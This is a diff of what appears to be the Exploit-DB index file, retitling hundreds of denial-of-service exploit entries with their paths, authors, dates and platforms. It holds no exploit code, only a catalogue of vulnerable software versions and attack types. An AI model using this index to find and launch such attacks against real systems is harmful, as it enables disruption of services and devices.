Tone-200 IP Phone - (Digest domain) Denial of Service",2007-03-21,MADYNES,hardware,dos,0 3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service",2007-03-22,DiGitalX,windows,dos,0 3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0 3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double-Free (PoC)",2007-03-27,"Stefan Esser",linux,dos,0 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 -3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Hang / Crash (Denial of Service)",2007-03-29,shinnai,multiple,dos,0 +3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 - Hang / Crash (Denial of Service)",2007-03-29,shinnai,multiple,dos,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service",2007-04-05,WiLdBoY,windows,dos,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows Explorer - Unspecified '.ANI' File Denial of Service",2007-04-08,Marsu,windows,dos,0 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 @@ -555,7 +555,7 @@ id,file,description,date,author,platform,type,port 3789,platforms/windows/dos/3789.html,"Second Sight Software - ActiveMod.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 3790,platforms/windows/dos/3790.html,"NetSprint Toolbar - ActiveX 'toolbar.dll' Denial of Service (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 3791,platforms/hardware/dos/3791.pl,"Linksys SPA941 - \377 Character Remote Denial of Service",2007-04-24,MADYNES,hardware,dos,0 -3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 - (remote reboot) Remote Denial of Service",2007-04-24,MADYNES,hardware,dos,0 +3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 - Remote Reboot (Denial of Service)",2007-04-24,MADYNES,hardware,dos,0 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow (PoC)",2007-04-27,mu-b,linux,dos,0 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - '.ra' Remote Denial of Service",2007-04-30,n00b,windows,dos,0 3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service",2007-05-01,shinnai,windows,dos,0 @@ -577,8 +577,8 @@ id,file,description,date,author,platform,type,port 3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 - (invalid string) Remote Denial of Service",2007-05-15,gbr,windows,dos,0 3930,platforms/windows/dos/3930.txt,"NewzCrawler 1.8 - (invalid string) Remote Denial of Service",2007-05-15,gbr,windows,dos,0 3937,platforms/windows/dos/3937.html,"PrecisionID Barcode ActiveX 1.9 - Remote Denial of Service",2007-05-16,shinnai,windows,dos,0 -3939,platforms/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 - caloggderd.exe Denial of Service",2007-05-16,Shirkdog,windows,dos,0 -3940,platforms/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 - Mediasvr.exe Denial of Service",2007-05-16,Shirkdog,windows,dos,0 +3939,platforms/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 - 'caloggderd.exe' Denial of Service",2007-05-16,Shirkdog,windows,dos,0 +3940,platforms/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Denial of Service",2007-05-16,Shirkdog,windows,dos,0 3945,platforms/linux/dos/3945.rb,"MagicISO 5.4 (build239) - '.cue' Heap Overflow (PoC)",2007-05-17,n00b,linux,dos,0 3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - /AUX / '.aspx' Remote Denial of Service",2007-05-21,kingcope,windows,dos,0 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - 'ltisi14E.ocx 14.5.0.44' Remote Denial of Service",2007-05-22,shinnai,windows,dos,0 @@ -701,7 +701,7 @@ id,file,description,date,author,platform,type,port 5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - '204 No Content' error Remote Denial of Service",2008-02-25,shinnai,windows,dos,0 5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0 5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",windows,dos,0 -5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service",2008-03-01,0in,linux,dos,0 +5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) - Denial of Service",2008-03-01,0in,linux,dos,0 5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,windows,dos,0 5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll' SetUninstallName() Heap Overflow (PoC)",2008-03-10,void,windows,dos,0 5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 @@ -716,7 +716,7 @@ id,file,description,date,author,platform,type,port 5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service",2008-03-30,Marsu,windows,dos,0 5327,platforms/windows/dos/5327.txt,"Microsoft Windows Explorer - Unspecified '.doc' File Denial of Service",2008-03-31,"Iron Team",windows,dos,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0 -5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0 +5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0 5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0 5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,windows,dos,0 @@ -760,7 +760,7 @@ id,file,description,date,author,platform,type,port 6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0 6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos,0 -6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - (reboot) Remote Denial of Service",2008-08-03,crit3rion,hardware,dos,0 +6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - Remote Reboot (Denial of Service)",2008-08-03,crit3rion,hardware,dos,0 6201,platforms/windows/dos/6201.html,"HydraIrc 0.3.164 - Remote Denial of Service",2008-08-04,securfrog,windows,dos,0 6216,platforms/windows/dos/6216.html,"Download Accelerator Plus DAP 8.6 - 'AniGIF.ocx' Buffer Overflow (PoC)",2008-08-10,"Guido Landi",windows,dos,0 6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation (PoC)",2008-08-10,"Core Security",multiple,dos,0 @@ -803,7 +803,7 @@ id,file,description,date,author,platform,type,port 6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0 6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0 6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0 -6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0 +6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device Long Name Remote Reboot (Denial of Service)",2008-09-26,"Julien Bedard",hardware,dos,0 6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ICO' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié",windows,dos,0 6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 - User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 @@ -879,7 +879,7 @@ id,file,description,date,author,platform,type,port 7460,platforms/windows/dos/7460.html,"EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0 7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - HTML Tag Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos,0 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 -7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 (Wireless ADSL Router) - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 +7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 Wireless ADSL Router - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - (8010/tcp) Remote Denial of Service",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 @@ -938,7 +938,7 @@ id,file,description,date,author,platform,type,port 7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0 7990,platforms/windows/dos/7990.py,"UltraVNC/TightVNC - Multiple VNC Clients Multiple Integer Overflow (PoC)",2009-02-04,"Andres Luksenberg",windows,dos,0 7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",windows,dos,0 -8008,platforms/hardware/dos/8008.txt,"Netgear SSL312 Router - Denial of Service",2009-02-09,Rembrandt,hardware,dos,0 +8008,platforms/hardware/dos/8008.txt,"NETGEAR SSL312 Router - Denial of Service",2009-02-09,Rembrandt,hardware,dos,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",hardware,dos,0 8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",multiple,dos,0 8024,platforms/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,windows,dos,0 @@ -950,7 +950,7 @@ id,file,description,date,author,platform,type,port 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0 8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",windows,dos,0 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0 -8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos,0 +8106,platforms/hardware/dos/8106.txt,"NETGEAR WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos,0 8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0 8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0 @@ -970,7 +970,7 @@ id,file,description,date,author,platform,type,port 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 -8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos,0 +8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos,0 8262,platforms/osx/dos/8262.c,"Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0 8263,platforms/osx/dos/8263.c,"Apple Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 8264,platforms/osx/dos/8264.c,"Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 @@ -1075,7 +1075,7 @@ id,file,description,date,author,platform,type,port 8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - (syslog) Denial of Service",2009-06-15,h00die,linux,dos,0 8957,platforms/multiple/dos/8957.txt,"Apple Safari & QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0 8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos,0 -8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0 +8964,platforms/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos,0 8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server - 'slowloris.pl' Low Bandwidth Denial of Service",2009-06-17,RSnake,multiple,dos,0 8982,platforms/linux/dos/8982.txt,"Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,linux,dos,0 @@ -1136,7 +1136,7 @@ id,file,description,date,author,platform,type,port 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 - Remote Dynamic Update Message Denial of Service (PoC)",2009-07-30,kingcope,multiple,dos,0 9304,platforms/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash",2009-07-30,LiquidWorm,windows,dos,0 9317,platforms/windows/dos/9317.c,"Google SketchUp Pro 7.0 - '.skp' Remote Stack Overflow (PoC)",2009-08-01,LiquidWorm,windows,dos,0 -9323,platforms/multiple/dos/9323.txt,"Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC)",2009-08-01,"Tadas Vilkeliskis",multiple,dos,0 +9323,platforms/multiple/dos/9323.txt,"Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (Denial of Service) (PoC)",2009-08-01,"Tadas Vilkeliskis",multiple,dos,0 9345,platforms/windows/dos/9345.pl,"RadASM 2.2.1.5 - '.mnu' Local Format String (PoC)",2009-08-03,SkuLL-HackeR,windows,dos,0 9359,platforms/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Buffer Overflow (PoC)",2009-08-04,hack4love,windows,dos,0 9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor - '.mnu' Stack Overflow (PoC)",2009-08-04,"Pankaj Kohli",windows,dos,0 @@ -1178,7 +1178,7 @@ id,file,description,date,author,platform,type,port 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)",2009-08-31,hack4love,windows,dos,0 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service",2009-08-31,"Gaurav Baruah",windows,dos,0 9549,platforms/windows/dos/9549.c,"MailEnable 1.52 - HTTP Mail Service Stack Buffer Overflow (PoC)",2009-08-31,"fl0 fl0w",windows,dos,0 -9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit",2009-08-31,TheLeader,windows,dos,0 +9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot (Denial of Service)",2009-08-31,TheLeader,windows,dos,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,windows,dos,0 9573,platforms/windows/dos/9573.pl,"dTunes 2.72 - (Filename Processing) Local Format String (PoC)",2009-09-01,TheLeader,windows,dos,0 9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1)",2009-09-03,"expose 0day",windows,dos,0 @@ -1194,7 +1194,7 @@ id,file,description,date,author,platform,type,port 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - (LIST command) Format String Denial of Service",2009-09-10,corelanc0d3r,windows,dos,0 9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - '.mid' Integer Overflow (PoC)",2009-09-10,Dr_IDE,windows,dos,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812 -9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 +9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service)",2009-09-11,crashbrz,hardware,dos,0 9657,platforms/windows/dos/9657.pl,"httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0 @@ -1515,7 +1515,7 @@ id,file,description,date,author,platform,type,port 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - 'EDImage.ocx' Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0 12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0 12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Blue Screen of Death (Denial of Service)",2010-04-23,p4r4N0ID,windows,dos,0 -12375,platforms/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 +12375,platforms/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS FileSystem Exploit (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0 12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 12408,platforms/windows/dos/12408.pl,"Apple Safari 4.0.5 (531.22.7) - Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 @@ -1703,7 +1703,7 @@ id,file,description,date,author,platform,type,port 14892,platforms/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf' 'smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos,0 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0 -14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 +14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0 @@ -2059,7 +2059,7 @@ id,file,description,date,author,platform,type,port 18008,platforms/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0 18011,platforms/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos,0 18014,platforms/windows/dos/18014.html,"Opera 11.51 - Use-After-Free Crash (PoC)",2011-10-21,"Roberto Suggi Liverani",windows,dos,0 -18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC)",2011-10-21,loneferret,windows,dos,0 +18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - 'CEPMServer.exe' Denial of Service (PoC)",2011-10-21,loneferret,windows,dos,0 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,windows,dos,0 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos,0 18024,platforms/windows/dos/18024.txt,"Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)",2011-10-23,KiDebug,windows,dos,0 @@ -2113,7 +2113,7 @@ id,file,description,date,author,platform,type,port 18978,platforms/php/dos/18978.php,"PHP 5.3.10 - spl_autoload_call() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18327,platforms/netware/dos/18327.txt,"Novell Netware - XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18328,platforms/netware/dos/18328.txt,"Novell Netware - XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 -18336,platforms/hardware/dos/18336.pl,"AirTies-4450 - Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 +18336,platforms/hardware/dos/18336.pl,"AirTies-4450 - Unauthorized Remote Reboot (Denial of Service)",2012-01-08,rigan,hardware,dos,0 18337,platforms/windows/dos/18337.pl,"M-Player 0.4 - Local Denial of Service",2012-01-08,JaMbA,windows,dos,0 18339,platforms/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 - '.lst' Local Denial of Service",2012-01-09,"Julien Ahrens",windows,dos,0 18351,platforms/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 @@ -2221,9 +2221,9 @@ id,file,description,date,author,platform,type,port 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos,0 19034,platforms/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos,0 -19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit",1991-05-01,anonymous,aix,dos,0 -19042,platforms/solaris/dos/19042.txt,"SunOS 4.1.1 - /usr/release/bin/makeinstall Exploit",1999-11-23,anonymous,solaris,dos,0 -19043,platforms/aix/dos/19043.txt,"SunOS 4.1.1 - /usr/release/bin/winstall Exploit",1999-11-12,anonymous,aix,dos,0 +19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - '/usr/bin/chroot' Exploit",1991-05-01,anonymous,aix,dos,0 +19042,platforms/solaris/dos/19042.txt,"SunOS 4.1.1 - '/usr/release/bin/makeinstall' Exploit",1999-11-23,anonymous,solaris,dos,0 +19043,platforms/aix/dos/19043.txt,"SunOS 4.1.1 - '/usr/release/bin/winstall' Exploit",1999-11-12,anonymous,aix,dos,0 19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash Exploit",1993-02-03,anonymous,aix,dos,0 19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0 @@ -2256,7 +2256,7 @@ id,file,description,date,author,platform,type,port 19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs Exploit",1999-02-19,"Brian Jones",linux,dos,0 19265,platforms/windows/dos/19265.py,"Total Video Player 1.31 - '.m3u' Crash (PoC)",2012-06-18,0dem,windows,dos,0 19271,platforms/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port Denial of Service",1999-01-19,"David Schwartz",linux,dos,0 -19272,platforms/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot",1999-01-26,"Dan Burcaw",linux,dos,0 +19272,platforms/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot (Denial of Service)",1999-01-26,"Dan Burcaw",linux,dos,0 19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX 10.20 / IBM AIX 4.1.5 - connect() Denial of Service",1997-03-05,"Cahya Wirawan",hp-ux,dos,0 19282,platforms/linux/dos/19282.c,"Linux Kernel 2.0 Sendmail - Denial of Service",1999-05-28,"Michal Zalewski",linux,dos,0 19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - Null Pointer Dereference",2012-06-19,"Luigi Auriemma",windows,dos,0 @@ -2444,7 +2444,7 @@ id,file,description,date,author,platform,type,port 20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 - Denial of Service",2000-10-09,zillion,windows,dos,0 20289,platforms/windows/dos/20289.txt,"Microsoft NetMeeting 3.0.1 4.4.3385 - Remote Desktop Sharing Denial of Service",2000-10-13,"Kirk Corey",windows,dos,0 20295,platforms/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin - SRC Parameter Remote Code Execution",2012-08-06,rgod,windows,dos,0 -20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 +20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0 20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos,0 20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0 @@ -2469,12 +2469,12 @@ id,file,description,date,author,platform,type,port 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL Denial of Service",2000-12-05,benjurry,windows,dos,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service",2000-12-06,blackangels,hardware,dos,0 20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)",2012-08-13,kingcope,linux,dos,0 -20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - 